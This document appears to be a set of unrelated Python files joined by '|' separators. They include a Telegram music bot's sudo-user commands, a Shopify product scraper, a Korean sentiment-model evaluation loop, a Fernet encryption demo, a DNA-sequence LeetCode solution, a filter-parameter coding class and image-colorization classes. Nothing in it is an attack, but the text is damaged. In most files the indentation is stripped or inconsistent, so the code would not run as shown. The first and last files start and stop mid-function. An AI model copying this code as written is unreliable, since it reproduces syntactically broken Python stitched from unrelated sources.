user = user.replace("@", "")
user = (await app.get_users(user))
from_user = message.from_user
sudoers = await get_sudoers()
if user.id in sudoers:
            return await message.reply_text("✅ Already a Sudo User.")
added = await add_sudo(user.id)
if added:
await message.reply_text(f"✅ Added **{user.mention}** as a Super User for Yukki OwO")
return os.execvp("python3", ["python3", "-m", "Music"])
        await message.reply_text("❌ Something wrong happened, check logs.")
return
from_user_id = message.from_user.id
user_id = message.reply_to_message.from_user.id
mention = message.reply_to_message.from_user.mention
sudoers = await get_sudoers()
if user_id in sudoers:
return await message.reply_text("✅ Already a Sudo User.")
added = await add_sudo(user_id)
if added:
await message.reply_text(f"✅ Added **{mention}** as a Super User for Yukki OwO")
return os.execvp("python3", ["python3", "-m", "Music"])
    await message.reply_text("❌ Something wrong happened, check logs.")
return
@app.on_message(filters.command("delmsudo") & filters.user(OWNER))
async def userdel(_, message: Message):
if not message.reply_to_message:
if len(message.command) != 2:
await message.reply_text("❌ Reply to a user's message or give username/user_id.")
return
user = message.text.split(None, 1)[1]
if "@" in user:
user = user.replace("@", "")
user = (await app.get_users(user))
from_user = message.from_user
if user.id not in await get_sudoers():
return await message.reply_text(f"❌ Not a part of Yukki's Sudo.")
removed = await remove_sudo(user.id)
if removed:
await message.reply_text(f"✅ Removed **{user.mention}** from Yukki's Sudo.")
return os.execvp("python3", ["python3", "-m", "Music"])
await message.reply_text(f"❌ Something wrong happened.")
return
from_user_id = message.from_user.id
user_id = message.reply_to_message.from_user.id
mention = message.reply_to_message.from_user.mention
if user_id not in await get_sudoers():
return await message.reply_text(f"❌ Not a part of Yukki's Sudo.")
removed = await remove_sudo(user_id)
if removed:
await message.reply_text(f"✅ Removed **{mention}** from Yukki's Sudo.")
return os.execvp("python3", ["python3", "-m", "Music"])
await message.reply_text(f"❌ Something wrong happened.")
@app.on_message(filters.command("sudolist"))
async def sudoers_list(_, message: Message):
sudoers = await get_sudoers()
text = "**__Sudo Users List of Yui Music:-__**\n\n"
for count, user_id in enumerate(sudoers, 1):
try:
user = await app.get_users(user_id)
user = user.first_name if not user.mention else user.mention
except Exception:
continue
text += f"➤ {user}\n"
if not text:
await message.reply_text("❌ No Sudo Users")
else:
await message.reply_text(text)
|
import requests
import json
# import dataset4
class ShopifyScraper():
def __init__(self,baseurl):
self.baseurl = baseurl
def downloadJson(self,pageNumber):
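        # Shopify storefronts expose a public products.json endpoint; limit is
        # commonly capped at 250 items per page, hence page-by-page fetching.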
r= requests.get(self.baseurl + f'products.json?limit=250&page={pageNumber}',timeout=20)
        if r.status_code != 200:
            print('Error : ', r.status_code)
            return None
if len(r.json()['products']) > 0:
data = r.json()['products']
return data
else:
return
def parsejson(self,jsondata):
productsArray=[]
for product in jsondata:
mainId= product['id']
mainTitle=product['title']
vendor= product['vendor']
product_type= product['product_type']
for variant in product['variants']:
item={
'id':mainId,
'product_type':product_type,
'mainTitle':mainTitle,
'vendor':vendor,
'variantId': variant['id'],
'vTitle': variant['title'],
'requires_shipping': variant['requires_shipping'],
'taxable': variant['taxable'],
'available': variant['available'],
'created_at': variant['created_at'],
'updated_at': variant['updated_at'],
'price': variant['price'],
'position': variant['position'],
}
productsArray.append(item)
return productsArray
def main():
all = ShopifyScraper('https://www.allbirds.co.uk/')
    allPageResults = []
for page in range(1,10):
data = all.downloadJson(page)
print('Getting data from: ',page)
try:
            allPageResults.append(all.parsejson(data))
except:
print(f'completed , pages = {page -1}')
break
    return allPageResults
products=main()
totalProducts = [item for i in products for item in i]
print('Total Products',len(totalProducts))
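# Optional illustrative sketch (not part of the original script): if pandas is
# available, take a quick look at the flattened variant list as a DataFrame.
try:
    import pandas as pd
    if totalProducts:
        print(pd.DataFrame(totalProducts)[['id', 'mainTitle', 'vTitle', 'price']].head())
except ImportError:
    pass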
# if __name__ == '__main__':
# # db = dataset.connect('location')
# # table = db.create_table('products',primary_id='variantId')
# # products=main()
# # totalProducts = [item for i in products for item in i]
# print('Total Products',len(totalProducts))
# # for p in totalProducts:
# # if not table.find_one(variantId=p['variantId']):
# # table.insert(p)
# # print('new product :' , p)
# print(data) |
import torch
import argparse
import os
import glob
from torch.utils.data import DataLoader, SequentialSampler
from tqdm import tqdm
from nsmc_modeling import RobertaForSequenceClassification
from bert.tokenizer import Tokenizer
from dataset import NSMCDataSet
def _get_parser():
parser = argparse.ArgumentParser()
parser.add_argument("--state_dict", type=str, required=True)
parser.add_argument("--bert_model", type=str, default='bert/')
parser.add_argument("--batch_size", type=int, default=32)
parser.add_argument("--max_seq_length", type=int, default=512)
parser.add_argument("--gpu_index", type=int, default=0)
parser.add_argument("--no_display", action="store_true")
return parser
if __name__ == "__main__":
args = _get_parser().parse_args()
tokenizer = Tokenizer(os.path.join(args.bert_model, "senti_vocab.txt"),
os.path.join(args.bert_model, "RoBERTa_Sentiment_kor"))
dataset = NSMCDataSet("test", tokenizer, max_seq_length=args.max_seq_length)
sampler = SequentialSampler(dataset)
dataloader = DataLoader(dataset,
batch_size=args.batch_size,
sampler=sampler,
collate_fn=dataset.collate_fn)
device = torch.device(type="cuda", index=args.gpu_index)
model = RobertaForSequenceClassification()
model_path = os.path.join('checkpoints/yaho/', '*.ckpt')
model_path_list = glob.glob(model_path)
for path in model_path_list:
model.load_state_dict(state_dict=torch.load(path, map_location=torch.device('cpu')), strict=False)
model.to(device)
model.eval()
match = 0
progress = 0
pbar = tqdm(dataloader, disable=args.no_display, desc="Eval")
for batch in pbar:
input_ids, attention_mask, labels = batch
inputs = {
"input_ids": torch.tensor(input_ids, dtype=torch.long).cuda(),
"attention_mask": torch.tensor(attention_mask, dtype=torch.long).cuda()
}
with torch.no_grad():
logits = model(**inputs)
labels = torch.tensor(labels, dtype=torch.float).cuda()
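            # Single-logit binary classification: logit >= 0 predicts the positive
            # class, which is compared against label == 1 to count matches.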
match_seq = (logits.view(-1) >= 0.0) == (labels.view(-1) == 1)
match += match_seq.sum().item()
progress += labels.size(0)
pbar.set_postfix(
{"state_dict": path, "accuracy": f"{100.0 * match / progress:.2f}"}
)
pbar.close()
log_file = open('./output/10^5step_log.txt', 'a')
        log_file.write("state_dict : " + path + ", accuracy : " + str(100 * match / progress) + '\n')
log_file.close()
print({"state_dict": path, "accuracy": f"{100 * match / progress:.2f}"})
|
from cryptography.fernet import Fernet
from faker import Faker
key = Fernet.generate_key()
f = Fernet(key)
text = Faker().text()
print('Text to encrypt:', text, '\n')
token = f.encrypt(text.encode())
print('Encrypted text:', token, '\n')
decrypted = f.decrypt(token)
print('Decrypted text:', decrypted)
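# Note: Fernet operates on bytes; decrypted.decode() would recover the original string.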
|
"""
Implements command line ``python -m td3a_cpp_deep <command> <args>``.
"""
import sys
def main(args, fLOG=print):
"""
Implements ``python -m td3a_check check <command> <args>``.
"""
from pyquickhelper.cli import cli_main_helper
try:
from . import check
except ImportError: # pragma: no cover
from td3a_cpp import check
fcts = dict(check=check)
return cli_main_helper(fcts, args=args, fLOG=fLOG)
if __name__ == "__main__":
main(sys.argv[1:])
|
class Solution(object):
def str2int(self,s):
res=0
        for i in range(len(s)):
res=(res<<3)+(ord(s[i])&7)
return res
def findRepeatedDnaSequences(self, s):
"""
:type s: str
:rtype: List[str]
"""
mapping={'A':0,'C':1,'G':2,'T':3}
if len(s)<=10:
return []
hashmapping={}
res=[]
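        # Encode each 10-letter window as a 20-bit integer (2 bits per base) and
        # count occurrences; append the substring the moment its count reaches 2.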
        for i in range(len(s)-9):
v=0
            for j in range(i,i+10):
v<<=2
v|=mapping[s[j]]
hashmapping[v]=hashmapping.get(v,0)+1
if hashmapping[v]==2:
res.append(s[i:i+10])
return res |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# SPDX-License-Identifier: Apache-2.0
# SPDX-FileCopyrightText: © 2021 Massachusetts Institute of Technology.
# SPDX-FileCopyrightText: © 2021 Lee McCuller <[email protected]>
# NOTICE: authors should document their contributions concisely in NOTICE
# with details inline in source files, comments, and docstrings.
"""
"""
import numpy as np
from ..codings_cmn import (
CodingTypeZ,
Ipi,
)
class CodingnlFnlA(CodingTypeZ):
N_parameters = 2
unstable = False
p_nlF_Hz = 0
p_nl_A = 0
max_amplitude = 1
def update(self, nlF_Hz, nl_A):
self.p_nlF_Hz = nlF_Hz
self.p_nl_A = nl_A
def reduce(self):
return [
self.p_nlF_Hz,
self.p_nl_A,
]
def option_set(self, minimum_BW_Hz=None, **kwargs):
super(CodingnlFnlA, self).option_set(**kwargs)
if minimum_BW_Hz is not None:
self.max_amplitude = 1 - (minimum_BW_Hz / self.sys.F_nyquist_Hz)
# TODO, should modify p_nl_A for the new max_amplitude
return
def update_roots(self, r1):
""" """
# TODO should honor max_amplitude
amp = abs(r1)
F_Hz = np.angle(r1) / np.pi * self.sys.F_nyquist_Hz
relF_Hz = F_Hz / self.sys.F_cutoff_Hz
if relF_Hz >= 1:
relF_Hz = 0.999
elif relF_Hz <= -1:
relF_Hz = 0.001
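        # Invert relF = p / sqrt(1 + p**2): recover the unbounded parameter p_nlF_Hz
        # from the bounded relative frequency relF_Hz in (-1, 1).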
self.p_nlF_Hz = relF_Hz / (1 - relF_Hz ** 2) ** 0.5
if amp < 1:
# amp = x / (1. + x**2)**.5
# amp**2 = x**2 / (1. + x**2)
# amp**2 (1. + x**2) = x**2
# amp**2 = x**2 ( 1 - amp**2)
# amp**2 / (1 - amp**2) = x**2
self.unstable = False
self.p_nl_A = amp / (1 - amp ** 2) ** 0.5
else:
# amp = (1. + x**2)**.5 / x
# amp**2 = (1. + x**2) / x**2
# amp**2 x**2 = x**2 + 1
# amp**2 = x**2 (amp**2 - 1)
# amp**2 / (amp**2 - 1) = x**2
self.unstable = True
amp = 1 / amp
self.p_nl_A = amp / (1 - amp ** 2) ** 0.5
return
@property
def gain_effect(self):
# always 1 since it is complex
if not self.unstable:
return 1
else:
return 1
@property
def relF_Hz(self):
val = self.p_nlF_Hz / (1.0 + self.p_nlF_Hz ** 2) ** 0.5
return val
@property
def amplitude(self):
if not self.unstable:
amp = self.max_amplitude * self.p_nl_A / (1.0 + self.p_nl_A ** 2) ** 0.5
else:
amp = (1.0 + self.p_nl_A ** 2) ** 0.5 / self.p_nl_A / self.max_amplitude
return amp
def transfer(self):
# frequency, logarithmic amplitude
amp = self.amplitude
r = amp * np.cos(
np.pi * self.sys.F_cutoff_Hz * self.relF_Hz / self.sys.F_nyquist_Hz
)
Xn = self.sys.Xzn_grid
Xnsq = self.sys.Xzn_grid_sq
return (amp * amp) * Xnsq - 2 * Xn * r + 1
def derivative(self):
if self.disable:
return []
# real/imaginary part of root
if not self.unstable:
sqp5 = (1.0 + self.p_nl_A ** 2) ** 0.5
amp = self.max_amplitude * self.p_nl_A / sqp5
DampDl = self.max_amplitude * (
1 / sqp5 - self.p_nl_A ** 2 / (1.0 + self.p_nl_A ** 2) ** 1.5
)
else:
sqp5 = (1.0 + self.p_nl_A ** 2) ** 0.5
amp = sqp5 / self.p_nl_A / self.max_amplitude
DampDl = (1 / sqp5 - sqp5 / self.p_nl_A ** 2) / self.max_amplitude
Fsqp5 = (1.0 + self.p_nlF_Hz ** 2) ** 0.5
relF_Hz = self.p_nlF_Hz / Fsqp5
DrelFHzDp = 1 / Fsqp5 - self.p_nlF_Hz ** 2 / (1.0 + self.p_nlF_Hz ** 2) ** 1.5
F_nyquist_Hz = self.sys.F_nyquist_Hz
Xn = self.sys.Xzn_grid
Xnsq = self.sys.Xzn_grid_sq
rcos = np.cos(np.pi * self.sys.F_cutoff_Hz * relF_Hz / F_nyquist_Hz)
rsin = np.sin(np.pi * self.sys.F_cutoff_Hz * relF_Hz / F_nyquist_Hz)
return [
DrelFHzDp
* (2 * amp * np.pi * self.sys.F_cutoff_Hz / self.sys.F_nyquist_Hz)
* (Xn * rsin),
((2 * amp * DampDl) * Xnsq - Xn * (2 * rcos * DampDl)),
]
def roots_c(self):
# real/imaginary part of root
return [
self.amplitude
* np.exp(
Ipi * abs(self.relF_Hz) * self.sys.F_cutoff_Hz / self.sys.F_nyquist_Hz
)
]
|
import numpy as np
import cv2
import matplotlib.pyplot as plt
from skimage import color
from sklearn.cluster import KMeans
import os
from scipy.ndimage import zoom
def create_temp_directory(path_template, N=1e8):
print(path_template)
cur_path = path_template % np.random.randint(0, N)
while(os.path.exists(cur_path)):
cur_path = path_template % np.random.randint(0, N)
print('Creating directory: %s' % cur_path)
os.mkdir(cur_path)
return cur_path
def lab2rgb_transpose(img_l, img_ab):
''' INPUTS
img_l 1xXxX [0,100]
img_ab 2xXxX [-100,100]
OUTPUTS
returned value is XxXx3 '''
pred_lab = np.concatenate((img_l, img_ab), axis=0).transpose((1, 2, 0))
pred_rgb = (np.clip(color.lab2rgb(pred_lab), 0, 1) * 255).astype('uint8')
return pred_rgb
def rgb2lab_transpose(img_rgb):
''' INPUTS
img_rgb XxXx3
OUTPUTS
returned value is 3xXxX '''
return color.rgb2lab(img_rgb).transpose((2, 0, 1))
class ColorizeImageBase():
def __init__(self, Xd=256, Xfullres_max=10000):
self.Xd = Xd
self.img_l_set = False
self.net_set = False
self.Xfullres_max = Xfullres_max # maximum size of maximum dimension
self.img_just_set = False # this will be true whenever image is just loaded
# net_forward can set this to False if they want
def prep_net(self):
raise Exception("Should be implemented by base class")
# ***** Image prepping *****
def load_image(self, input_path):
# rgb image [CxXdxXd]
im = cv2.cvtColor(cv2.imread(input_path, 1), cv2.COLOR_BGR2RGB)
self.img_rgb_fullres = im.copy()
self._set_img_lab_fullres_()
im = cv2.resize(im, (self.Xd, self.Xd))
self.img_rgb = im.copy()
# self.img_rgb = sp.misc.imresize(plt.imread(input_path),(self.Xd,self.Xd)).transpose((2,0,1))
self.img_l_set = True
# convert into lab space
self._set_img_lab_()
self._set_img_lab_mc_()
def set_image(self, input_image):
self.img_rgb_fullres = input_image.copy()
self._set_img_lab_fullres_()
self.img_l_set = True
self.img_rgb = input_image
# convert into lab space
self._set_img_lab_()
self._set_img_lab_mc_()
def net_forward(self, input_ab, input_mask):
# INPUTS
# ab 2xXxX input color patches (non-normalized)
# mask 1xXxX input mask, indicating which points have been provided
# assumes self.img_l_mc has been set
if(not self.img_l_set):
print('I need to have an image!')
return -1
if(not self.net_set):
print('I need to have a net!')
return -1
self.input_ab = input_ab
self.input_ab_mc = (input_ab - self.ab_mean) / self.ab_norm
self.input_mask = input_mask
self.input_mask_mult = input_mask * self.mask_mult
return 0
def get_result_PSNR(self, result=-1, return_SE_map=False):
if np.array((result)).flatten()[0] == -1:
cur_result = self.get_img_forward()
else:
cur_result = result.copy()
SE_map = (1. * self.img_rgb - cur_result)**2
cur_MSE = np.mean(SE_map)
cur_PSNR = 20 * np.log10(255. / np.sqrt(cur_MSE))
if return_SE_map:
return(cur_PSNR, SE_map)
else:
return cur_PSNR
def get_img_forward(self):
# get image with point estimate
return self.output_rgb
def get_img_gray(self):
# Get black and white image
return lab2rgb_transpose(self.img_l, np.zeros((2, self.Xd, self.Xd)))
def get_img_gray_fullres(self):
# Get black and white image
return lab2rgb_transpose(self.img_l_fullres, np.zeros((2, self.img_l_fullres.shape[1], self.img_l_fullres.shape[2])))
def get_img_fullres(self):
# This assumes self.img_l_fullres, self.output_ab are set.
# Typically, this means that set_image() and net_forward()
# have been called.
# bilinear upsample
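        # zoom factors: keep the 2 ab channels unchanged (factor 1) and scale the
        # spatial dims up to match the full-resolution L channel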
zoom_factor = (1, 1. * self.img_l_fullres.shape[1] / self.output_ab.shape[1], 1. * self.img_l_fullres.shape[2] / self.output_ab.shape[2])
output_ab_fullres = zoom(self.output_ab, zoom_factor, order=1)
return lab2rgb_transpose(self.img_l_fullres, output_ab_fullres)
def get_input_img_fullres(self):
zoom_factor = (1, 1. * self.img_l_fullres.shape[1] / self.input_ab.shape[1], 1. * self.img_l_fullres.shape[2] / self.input_ab.shape[2])
input_ab_fullres = zoom(self.input_ab, zoom_factor, order=1)
return lab2rgb_transpose(self.img_l_fullres, input_ab_fullres)
def get_input_img(self):
return lab2rgb_transpose(self.img_l, self.input_ab)
def get_img_mask(self):
# Get black and white image
return lab2rgb_transpose(100. * (1 - self.input_mask), np.zeros((2, self.Xd, self.Xd)))
def get_img_mask_fullres(self):
# Get black and white image
zoom_factor = (1, 1. * self.img_l_fullres.shape[1] / self.input_ab.shape[1], 1. * self.img_l_fullres.shape[2] / self.input_ab.shape[2])
input_mask_fullres = zoom(self.input_mask, zoom_factor, order=0)
return lab2rgb_transpose(100. * (1 - input_mask_fullres), np.zeros((2, input_mask_fullres.shape[1], input_mask_fullres.shape[2])))
def get_sup_img(self):
return lab2rgb_transpose(50 * self.input_mask, self.input_ab)
def get_sup_fullres(self):
zoom_factor = (1, 1. * self.img_l_fullres.shape[1] / self.output_ab.shape[1], 1. * self.img_l_fullres.shape[2] / self.output_ab.shape[2])
input_mask_fullres = zoom(self.input_mask, zoom_factor, order=0)
input_ab_fullres = zoom(self.input_ab, zoom_factor, order=0)
return lab2rgb_transpose(50 * input_mask_fullres, input_ab_fullres)
# ***** Private functions *****
def _set_img_lab_fullres_(self):
# adjust full resolution image to be within maximum dimension is within Xfullres_max
Xfullres = self.img_rgb_fullres.shape[0]
Yfullres = self.img_rgb_fullres.shape[1]
if Xfullres > self.Xfullres_max or Yfullres > self.Xfullres_max:
if Xfullres > Yfullres:
zoom_factor = 1. * self.Xfullres_max / Xfullres
else:
zoom_factor = 1. * self.Xfullres_max / Yfullres
self.img_rgb_fullres = zoom(self.img_rgb_fullres, (zoom_factor, zoom_factor, 1), order=1)
self.img_lab_fullres = color.rgb2lab(self.img_rgb_fullres).transpose((2, 0, 1))
self.img_l_fullres = self.img_lab_fullres[[0], :, :]
self.img_ab_fullres = self.img_lab_fullres[1:, :, :]
def _set_img_lab_(self):
# set self.img_lab from self.im_rgb
self.img_lab = color.rgb2lab(self.img_rgb).transpose((2, 0, 1))
self.img_l = self.img_lab[[0], :, :]
self.img_ab = self.img_lab[1:, :, :]
def _set_img_lab_mc_(self):
# set self.img_lab_mc from self.img_lab
# lab image, mean centered [XxYxX]
self.img_lab_mc = self.img_lab / np.array((self.l_norm, self.ab_norm, self.ab_norm))[:, np.newaxis, np.newaxis] - np.array(
(self.l_mean / self.l_norm, self.ab_mean / self.ab_norm, self.ab_mean / self.ab_norm))[:, np.newaxis, np.newaxis]
self._set_img_l_()
def _set_img_l_(self):
self.img_l_mc = self.img_lab_mc[[0], :, :]
self.img_l_set = True
def _set_img_ab_(self):
self.img_ab_mc = self.img_lab_mc[[1, 2], :, :]
def _set_out_ab_(self):
self.output_lab = rgb2lab_transpose(self.output_rgb)
self.output_ab = self.output_lab[1:, :, :]
class ColorizeImageTorch(ColorizeImageBase):
def __init__(self, Xd=256):
print('ColorizeImageTorch instantiated')
ColorizeImageBase.__init__(self, Xd)
self.l_norm = 1.
self.ab_norm = 1.
self.l_mean = 50.
self.ab_mean = 0.
self.mask_mult = 1.
# Load grid properties
self.pts_in_hull = np.array(np.meshgrid(np.arange(-110, 120, 10), np.arange(-110, 120, 10))).reshape((2, 529)).T
# ***** Net preparation *****
def prep_net(self, gpu_id=None, path='', dist=False):
import torch
import models.pytorch.model as model
print('path = %s' % path)
print('Model set! dist mode? ', dist)
self.net = model.SIGGRAPHGenerator(dist=dist)
state_dict = torch.load(path)
if hasattr(state_dict, '_metadata'):
del state_dict._metadata
# patch InstanceNorm checkpoints prior to 0.4
for key in list(state_dict.keys()): # need to copy keys here because we mutate in loop
self.__patch_instance_norm_state_dict(state_dict, self.net, key.split('.'))
self.net.load_state_dict(state_dict)
if gpu_id != -1:
self.net.cuda()
self.net.eval()
self.net_set = True
def __patch_instance_norm_state_dict(self, state_dict, module, keys, i=0):
key = keys[i]
if i + 1 == len(keys): # at the end, pointing to a parameter/buffer
if module.__class__.__name__.startswith('InstanceNorm') and \
(key == 'running_mean' or key == 'running_var'):
if getattr(module, key) is None:
state_dict.pop('.'.join(keys))
if module.__class__.__name__.startswith('InstanceNorm') and \
(key == 'num_batches_tracked'):
state_dict.pop('.'.join(keys))
else:
self.__patch_instance_norm_state_dict(state_dict, getattr(module, key), keys, i + 1)
# ***** Call forward *****
def net_forward(self, input_ab, input_mask):
# INPUTS
# ab 2xXxX input color patches (non-normalized)
# mask 1xXxX input mask, indicating which points have been provided
# assumes self.img_l_mc has been set
if ColorizeImageBase.net_forward(self, input_ab, input_mask) == -1:
return -1
# net_input_prepped = np.concatenate((self.img_l_mc, self.input_ab_mc, self.input_mask_mult), axis=0)
# return prediction
# self.net.blobs['data_l_ab_mask'].data[...] = net_input_prepped
# embed()
output_ab = self.net.forward(self.img_l_mc, self.input_ab_mc, self.input_mask_mult)[0, :, :, :].cpu().data.numpy()
self.output_rgb = lab2rgb_transpose(self.img_l, output_ab)
# self.output_rgb = lab2rgb_transpose(self.img_l, self.net.blobs[self.pred_ab_layer].data[0, :, :, :])
self._set_out_ab_()
return self.output_rgb
def get_img_forward(self):
# get image with point estimate
return self.output_rgb
def get_img_gray(self):
# Get black and white image
return lab2rgb_transpose(self.img_l, np.zeros((2, self.Xd, self.Xd)))
class ColorizeImageTorchDist(ColorizeImageTorch):
def __init__(self, Xd=256):
ColorizeImageTorch.__init__(self, Xd)
self.dist_ab_set = False
self.pts_grid = np.array(np.meshgrid(np.arange(-110, 120, 10), np.arange(-110, 120, 10))).reshape((2, 529)).T
self.in_hull = np.ones(529, dtype=bool)
self.AB = self.pts_grid.shape[0] # 529
self.A = int(np.sqrt(self.AB)) # 23
self.B = int(np.sqrt(self.AB)) # 23
self.dist_ab_full = np.zeros((self.AB, self.Xd, self.Xd))
self.dist_ab_grid = np.zeros((self.A, self.B, self.Xd, self.Xd))
self.dist_entropy = np.zeros((self.Xd, self.Xd))
def prep_net(self, gpu_id=None, path='', dist=True, S=.2):
ColorizeImageTorch.prep_net(self, gpu_id=gpu_id, path=path, dist=dist)
# set S somehow
def net_forward(self, input_ab, input_mask):
# INPUTS
# ab 2xXxX input color patches (non-normalized)
# mask 1xXxX input mask, indicating which points have been provided
# assumes self.img_l_mc has been set
# embed()
if ColorizeImageBase.net_forward(self, input_ab, input_mask) == -1:
return -1
# set distribution
(function_return, self.dist_ab) = self.net.forward(self.img_l_mc, self.input_ab_mc, self.input_mask_mult)
function_return = function_return[0, :, :, :].cpu().data.numpy()
self.dist_ab = self.dist_ab[0, :, :, :].cpu().data.numpy()
self.dist_ab_set = True
# full grid, ABxXxX, AB = 529
self.dist_ab_full[self.in_hull, :, :] = self.dist_ab
# gridded, AxBxXxX, A = 23
self.dist_ab_grid = self.dist_ab_full.reshape((self.A, self.B, self.Xd, self.Xd))
# return
return function_return
def get_ab_reccs(self, h, w, K=5, N=25000, return_conf=False):
''' Recommended colors at point (h,w)
Call this after calling net_forward
'''
if not self.dist_ab_set:
print('Need to set prediction first')
return 0
# randomly sample from pdf
cmf = np.cumsum(self.dist_ab[:, h, w]) # CMF
cmf = cmf / cmf[-1]
cmf_bins = cmf
# randomly sample N points
rnd_pts = np.random.uniform(low=0, high=1.0, size=N)
inds = np.digitize(rnd_pts, bins=cmf_bins)
rnd_pts_ab = self.pts_in_hull[inds, :]
# run k-means
kmeans = KMeans(n_clusters=K).fit(rnd_pts_ab)
# sort by cluster occupancy
k_label_cnt = np.histogram(kmeans.labels_, np.arange(0, K + 1))[0]
k_inds = np.argsort(k_label_cnt, axis=0)[::-1]
cluster_per = 1. * k_label_cnt[k_inds] / N # percentage of points within cluster
cluster_centers = kmeans.cluster_centers_[k_inds, :] # cluster centers
# cluster_centers = np.random.uniform(low=-100,high=100,size=(N,2))
if return_conf:
return cluster_centers, cluster_per
else:
return cluster_centers
def compute_entropy(self):
# compute the distribution entropy (really slow right now)
self.dist_entropy = np.sum(self.dist_ab * np.log(self.dist_ab), axis=0)
def plot_dist_grid(self, h, w):
# Plots distribution at a given point
plt.figure()
plt.imshow(self.dist_ab_grid[:, :, h, w], extent=[-110, 110, 110, -110], interpolation='nearest')
plt.colorbar()
plt.ylabel('a')
plt.xlabel('b')
def plot_dist_entropy(self):
# Plots distribution at a given point
plt.figure()
plt.imshow(-self.dist_entropy, interpolation='nearest')
plt.colorbar()
class ColorizeImageCaffe(ColorizeImageBase):
def __init__(self, Xd=256):
print('ColorizeImageCaffe instantiated')
ColorizeImageBase.__init__(self, Xd)
self.l_norm = 1.
self.ab_norm = 1.
self.l_mean = 50.
self.ab_mean = 0.
self.mask_mult = 110.
self.pred_ab_layer = 'pred_ab' # predicted ab layer
# Load grid properties
self.pts_in_hull_path = './data/color_bins/pts_in_hull.npy'
self.pts_in_hull = np.load(self.pts_in_hull_path) # 313x2, in-gamut
# ***** Net preparation *****
def prep_net(self, gpu_id, prototxt_path='', caffemodel_path=''):
import caffe
print('gpu_id = %d, net_path = %s, model_path = %s' % (gpu_id, prototxt_path, caffemodel_path))
if gpu_id == -1:
caffe.set_mode_cpu()
else:
caffe.set_device(gpu_id)
caffe.set_mode_gpu()
self.gpu_id = gpu_id
self.net = caffe.Net(prototxt_path, caffemodel_path, caffe.TEST)
self.net_set = True
# automatically set cluster centers
if len(self.net.params[self.pred_ab_layer][0].data[...].shape) == 4 and self.net.params[self.pred_ab_layer][0].data[...].shape[1] == 313:
print('Setting ab cluster centers in layer: %s' % self.pred_ab_layer)
self.net.params[self.pred_ab_layer][0].data[:, :, 0, 0] = self.pts_in_hull.T
# automatically set upsampling kernel
for layer in self.net._layer_names:
if layer[-3:] == '_us':
print('Setting upsampling layer kernel: %s' % layer)
self.net.params[layer][0].data[:, 0, :, :] = np.array(((.25, .5, .25, 0), (.5, 1., .5, 0), (.25, .5, .25, 0), (0, 0, 0, 0)))[np.newaxis, :, :]
# ***** Call forward *****
def net_forward(self, input_ab, input_mask):
# INPUTS
# ab 2xXxX input color patches (non-normalized)
# mask 1xXxX input mask, indicating which points have been provided
# assumes self.img_l_mc has been set
if ColorizeImageBase.net_forward(self, input_ab, input_mask) == -1:
return -1
net_input_prepped = np.concatenate((self.img_l_mc, self.input_ab_mc, self.input_mask_mult), axis=0)
self.net.blobs['data_l_ab_mask'].data[...] = net_input_prepped
self.net.forward()
# return prediction
self.output_rgb = lab2rgb_transpose(self.img_l, self.net.blobs[self.pred_ab_layer].data[0, :, :, :])
self._set_out_ab_()
return self.output_rgb
def get_img_forward(self):
# get image with point estimate
return self.output_rgb
def get_img_gray(self):
# Get black and white image
return lab2rgb_transpose(self.img_l, np.zeros((2, self.Xd, self.Xd)))
class ColorizeImageCaffeGlobDist(ColorizeImageCaffe):
# Caffe colorization, with additional global histogram as input
def __init__(self, Xd=256):
ColorizeImageCaffe.__init__(self, Xd)
self.glob_mask_mult = 1.
self.glob_layer = 'glob_ab_313_mask'
def net_forward(self, input_ab, input_mask, glob_dist=-1):
# glob_dist is 313 array, or -1
if np.array(glob_dist).flatten()[0] == -1: # run without this, zero it out
self.net.blobs[self.glob_layer].data[0, :-1, 0, 0] = 0.
self.net.blobs[self.glob_layer].data[0, -1, 0, 0] = 0.
else: # run conditioned on global histogram
self.net.blobs[self.glob_layer].data[0, :-1, 0, 0] = glob_dist
self.net.blobs[self.glob_layer].data[0, -1, 0, 0] = self.glob_mask_mult
self.output_rgb = ColorizeImageCaffe.net_forward(self, input_ab, input_mask)
self._set_out_ab_()
return self.output_rgb
class ColorizeImageCaffeDist(ColorizeImageCaffe):
# caffe model which includes distribution prediction
def __init__(self, Xd=256):
ColorizeImageCaffe.__init__(self, Xd)
self.dist_ab_set = False
self.scale_S_layer = 'scale_S'
self.dist_ab_S_layer = 'dist_ab_S' # softened distribution layer
self.pts_grid = np.load('./data/color_bins/pts_grid.npy') # 529x2, all points
self.in_hull = np.load('./data/color_bins/in_hull.npy') # 529 bool
self.AB = self.pts_grid.shape[0] # 529
self.A = int(np.sqrt(self.AB)) # 23
self.B = int(np.sqrt(self.AB)) # 23
self.dist_ab_full = np.zeros((self.AB, self.Xd, self.Xd))
self.dist_ab_grid = np.zeros((self.A, self.B, self.Xd, self.Xd))
self.dist_entropy = np.zeros((self.Xd, self.Xd))
def prep_net(self, gpu_id, prototxt_path='', caffemodel_path='', S=.2):
ColorizeImageCaffe.prep_net(self, gpu_id, prototxt_path=prototxt_path, caffemodel_path=caffemodel_path)
self.S = S
self.net.params[self.scale_S_layer][0].data[...] = S
def net_forward(self, input_ab, input_mask):
# INPUTS
# ab 2xXxX input color patches (non-normalized)
# mask 1xXxX input mask, indicating which points have been provided
# assumes self.img_l_mc has been set
function_return = ColorizeImageCaffe.net_forward(self, input_ab, input_mask)
if np.array(function_return).flatten()[0] == -1: # errored out
return -1
# set distribution
# in-gamut, CxXxX, C = 313
self.dist_ab = self.net.blobs[self.dist_ab_S_layer].data[0, :, :, :]
self.dist_ab_set = True
# full grid, ABxXxX, AB = 529
self.dist_ab_full[self.in_hull, :, :] = self.dist_ab
# gridded, AxBxXxX, A = 23
self.dist_ab_grid = self.dist_ab_full.reshape((self.A, self.B, self.Xd, self.Xd))
# return
return function_return
def get_ab_reccs(self, h, w, K=5, N=25000, return_conf=False):
''' Recommended colors at point (h,w)
Call this after calling net_forward
'''
if not self.dist_ab_set:
print('Need to set prediction first')
return 0
# randomly sample from pdf
cmf = np.cumsum(self.dist_ab[:, h, w]) # CMF
cmf = cmf / cmf[-1]
cmf_bins = cmf
# randomly sample N points
rnd_pts = np.random.uniform(low=0, high=1.0, size=N)
inds = np.digitize(rnd_pts, bins=cmf_bins)
rnd_pts_ab = self.pts_in_hull[inds, :]
# run k-means
kmeans = KMeans(n_clusters=K).fit(rnd_pts_ab)
# sort by cluster occupancy
k_label_cnt = np.histogram(kmeans.labels_, np.arange(0, K + 1))[0]
k_inds = np.argsort(k_label_cnt, axis=0)[::-1]
cluster_per = 1. * k_label_cnt[k_inds] / N # percentage of points within cluster
